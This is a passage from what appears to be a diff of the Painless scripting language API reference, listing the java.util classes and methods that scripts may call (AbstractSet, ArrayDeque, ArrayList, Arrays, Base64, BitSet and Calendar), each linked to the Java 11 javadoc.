List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractSequentialList]] -==== AbstractSequentialList -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AbstractSet]] -==== AbstractSet -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArrayDeque]] -==== ArrayDeque -* {java11-javadoc}/java.base/java/util/ArrayDeque.html#()[ArrayDeque]() -* {java11-javadoc}/java.base/java/util/ArrayDeque.html#(java.util.Collection)[ArrayDeque](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* void {java11-javadoc}/java.base/java/util/Deque.html#addFirst(java.lang.Object)[addFirst](def) -* void {java11-javadoc}/java.base/java/util/Deque.html#addLast(java.lang.Object)[addLast](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* ArrayDeque {java11-javadoc}/java.base/java/util/ArrayDeque.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/Deque.html#descendingIterator()[descendingIterator]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/Deque.html#getFirst()[getFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#getLast()[getLast]() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerFirst(java.lang.Object)[offerFirst](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerLast(java.lang.Object)[offerLast](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekFirst()[peekFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekLast()[peekLast]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollLast()[pollLast]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pop()[pop]() -* void {java11-javadoc}/java.base/java/util/Deque.html#push(java.lang.Object)[push](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeFirst()[removeFirst]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeFirstOccurrence(java.lang.Object)[removeFirstOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeLast()[removeLast]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeLastOccurrence(java.lang.Object)[removeLastOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArrayList]] -==== ArrayList -* {java11-javadoc}/java.base/java/util/ArrayList.html#()[ArrayList]() -* {java11-javadoc}/java.base/java/util/ArrayList.html#(java.util.Collection)[ArrayList](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/ArrayList.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* void {java11-javadoc}/java.base/java/util/ArrayList.html#trimToSize()[trimToSize]() - - -[[painless-api-reference-shared-Arrays]] -==== Arrays -* static List {java11-javadoc}/java.base/java/util/Arrays.html#asList(java.lang.Object%5B%5D)[asList](Object[]) -* static boolean {java11-javadoc}/java.base/java/util/Arrays.html#deepEquals(java.lang.Object%5B%5D,java.lang.Object%5B%5D)[deepEquals](Object[], Object[]) -* static int {java11-javadoc}/java.base/java/util/Arrays.html#deepHashCode(java.lang.Object%5B%5D)[deepHashCode](Object[]) -* static null {java11-javadoc}/java.base/java/util/Arrays.html#deepToString(java.lang.Object%5B%5D)[deepToString](Object[]) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Base64]] -==== Base64 -* static Base64.Decoder {java11-javadoc}/java.base/java/util/Base64.html#getDecoder()[getDecoder]() -* static Base64.Encoder {java11-javadoc}/java.base/java/util/Base64.html#getEncoder()[getEncoder]() -* static Base64.Decoder {java11-javadoc}/java.base/java/util/Base64.html#getMimeDecoder()[getMimeDecoder]() -* static Base64.Encoder {java11-javadoc}/java.base/java/util/Base64.html#getMimeEncoder()[getMimeEncoder]() -* static Base64.Encoder {java11-javadoc}/java.base/java/util/Base64.html#getMimeEncoder(int,byte%5B%5D)[getMimeEncoder](int, byte[]) -* static Base64.Decoder {java11-javadoc}/java.base/java/util/Base64.html#getUrlDecoder()[getUrlDecoder]() -* static Base64.Encoder {java11-javadoc}/java.base/java/util/Base64.html#getUrlEncoder()[getUrlEncoder]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Base64-Decoder]] -==== Base64.Decoder -* byte[] {java11-javadoc}/java.base/java/util/Base64$Decoder.html#decode(java.lang.String)[decode](null) -* int {java11-javadoc}/java.base/java/util/Base64$Decoder.html#decode(byte%5B%5D,byte%5B%5D)[decode](byte[], byte[]) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Base64-Encoder]] -==== Base64.Encoder -* int {java11-javadoc}/java.base/java/util/Base64$Encoder.html#encode(byte%5B%5D,byte%5B%5D)[encode](byte[], byte[]) -* null {java11-javadoc}/java.base/java/util/Base64$Encoder.html#encodeToString(byte%5B%5D)[encodeToString](byte[]) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Base64.Encoder {java11-javadoc}/java.base/java/util/Base64$Encoder.html#withoutPadding()[withoutPadding]() - - -[[painless-api-reference-shared-BitSet]] -==== BitSet -* static BitSet {java11-javadoc}/java.base/java/util/BitSet.html#valueOf(long%5B%5D)[valueOf](long[]) -* {java11-javadoc}/java.base/java/util/BitSet.html#()[BitSet]() -* {java11-javadoc}/java.base/java/util/BitSet.html#(int)[BitSet](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#and(java.util.BitSet)[and](BitSet) -* void {java11-javadoc}/java.base/java/util/BitSet.html#andNot(java.util.BitSet)[andNot](BitSet) -* int {java11-javadoc}/java.base/java/util/BitSet.html#cardinality()[cardinality]() -* void {java11-javadoc}/java.base/java/util/BitSet.html#clear()[clear]() -* void {java11-javadoc}/java.base/java/util/BitSet.html#clear(int)[clear](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#clear(int,int)[clear](int, int) -* def {java11-javadoc}/java.base/java/util/BitSet.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/BitSet.html#flip(int)[flip](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#flip(int,int)[flip](int, int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/BitSet.html#intersects(java.util.BitSet)[intersects](BitSet) -* boolean {java11-javadoc}/java.base/java/util/BitSet.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/util/BitSet.html#length()[length]() -* int {java11-javadoc}/java.base/java/util/BitSet.html#nextClearBit(int)[nextClearBit](int) -* int {java11-javadoc}/java.base/java/util/BitSet.html#nextSetBit(int)[nextSetBit](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#or(java.util.BitSet)[or](BitSet) -* int {java11-javadoc}/java.base/java/util/BitSet.html#previousClearBit(int)[previousClearBit](int) -* int {java11-javadoc}/java.base/java/util/BitSet.html#previousSetBit(int)[previousSetBit](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#set(int)[set](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#set(int,int)[set](int, int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#set(int,int,boolean)[set](int, int, boolean) -* int {java11-javadoc}/java.base/java/util/BitSet.html#size()[size]() -* byte[] {java11-javadoc}/java.base/java/util/BitSet.html#toByteArray()[toByteArray]() -* long[] {java11-javadoc}/java.base/java/util/BitSet.html#toLongArray()[toLongArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* void {java11-javadoc}/java.base/java/util/BitSet.html#xor(java.util.BitSet)[xor](BitSet) - - -[[painless-api-reference-shared-Calendar]] -==== Calendar -* static int {java11-javadoc}/java.base/java/util/Calendar.html#ALL_STYLES[ALL_STYLES] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#AM[AM] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#AM_PM[AM_PM] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#APRIL[APRIL] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#AUGUST[AUGUST] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DATE[DATE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DAY_OF_MONTH[DAY_OF_MONTH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DAY_OF_WEEK[DAY_OF_WEEK] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DAY_OF_WEEK_IN_MONTH[DAY_OF_WEEK_IN_MONTH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DAY_OF_YEAR[DAY_OF_YEAR] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DECEMBER[DECEMBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DST_OFFSET[DST_OFFSET] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#ERA[ERA] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#FEBRUARY[FEBRUARY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#FIELD_COUNT[FIELD_COUNT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#FRIDAY[FRIDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#HOUR[HOUR] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#HOUR_OF_DAY[HOUR_OF_DAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#JANUARY[JANUARY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#JULY[JULY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#JUNE[JUNE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#LONG[LONG] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#LONG_FORMAT[LONG_FORMAT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#LONG_STANDALONE[LONG_STANDALONE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MARCH[MARCH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MAY[MAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MILLISECOND[MILLISECOND] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MINUTE[MINUTE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MONDAY[MONDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MONTH[MONTH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#NARROW_FORMAT[NARROW_FORMAT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#NARROW_STANDALONE[NARROW_STANDALONE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#NOVEMBER[NOVEMBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#OCTOBER[OCTOBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#PM[PM] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SATURDAY[SATURDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SECOND[SECOND] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SEPTEMBER[SEPTEMBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SHORT[SHORT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SHORT_FORMAT[SHORT_FORMAT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SHORT_STANDALONE[SHORT_STANDALONE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SUNDAY[SUNDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#THURSDAY[THURSDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#TUESDAY[TUESDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#UNDECIMBER[UNDECIMBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#WEDNESDAY[WEDNESDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#WEEK_OF_MONTH[WEEK_OF_MONTH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#WEEK_OF_YEAR[WEEK_OF_YEAR] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#YEAR[YEAR] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#ZONE_OFFSET[ZONE_OFFSET] -* static Set {java11-javadoc}/java.base/java/util/Calendar.html#getAvailableCalendarTypes()[getAvailableCalendarTypes]() -* static Locale[] {java11-javadoc}/java.base/java/util/Calendar.html#getAvailableLocales()[getAvailableLocales]() -* static Calendar {java11-javadoc}/java.base/java/util/Calendar.html#getInstance()[getInstance]() -* static Calendar {java11-javadoc}/java.base/java/util/Calendar.html#getInstance(java.util.TimeZone)[getInstance](TimeZone) -* static Calendar {java11-javadoc}/java.base/java/util/Calendar.html#getInstance(java.util.TimeZone,java.util.Locale)[getInstance](TimeZone, Locale) -* void {java11-javadoc}/java.base/java/util/Calendar.html#add(int,int)[add](int, int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#after(java.lang.Object)[after](Object) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#before(java.lang.Object)[before](Object) -* void {java11-javadoc}/java.base/java/util/Calendar.html#clear()[clear]() -* void {java11-javadoc}/java.base/java/util/Calendar.html#clear(int)[clear](int) -* def {java11-javadoc}/java.base/java/util/Calendar.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#compareTo(java.util.Calendar)[compareTo](Calendar) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/Calendar.html#get(int)[get](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getActualMaximum(int)[getActualMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getActualMinimum(int)[getActualMinimum](int) -* null {java11-javadoc}/java.base/java/util/Calendar.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/util/Calendar.html#getDisplayName(int,int,java.util.Locale)[getDisplayName](int, int, Locale) -* Map {java11-javadoc}/java.base/java/util/Calendar.html#getDisplayNames(int,int,java.util.Locale)[getDisplayNames](int, int, Locale) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getFirstDayOfWeek()[getFirstDayOfWeek]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getGreatestMinimum(int)[getGreatestMinimum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getLeastMaximum(int)[getLeastMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMaximum(int)[getMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMinimalDaysInFirstWeek()[getMinimalDaysInFirstWeek]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMinimum(int)[getMinimum](int) -* Date {java11-javadoc}/java.base/java/util/Calendar.html#getTime()[getTime]() -* long {java11-javadoc}/java.base/java/util/Calendar.html#getTimeInMillis()[getTimeInMillis]() -* TimeZone {java11-javadoc}/java.base/java/util/Calendar.html#getTimeZone()[getTimeZone]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getWeekYear()[getWeekYear]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getWeeksInWeekYear()[getWeeksInWeekYear]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isLenient()[isLenient]() -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isSet(int)[isSet](int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isWeekDateSupported()[isWeekDateSupported]() -* void {java11-javadoc}/java.base/java/util/Calendar.html#roll(int,int)[roll](int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int)[set](int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int)[set](int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int,int,int)[set](int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int,int,int,int)[set](int, int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setFirstDayOfWeek(int)[setFirstDayOfWeek](int) -* void 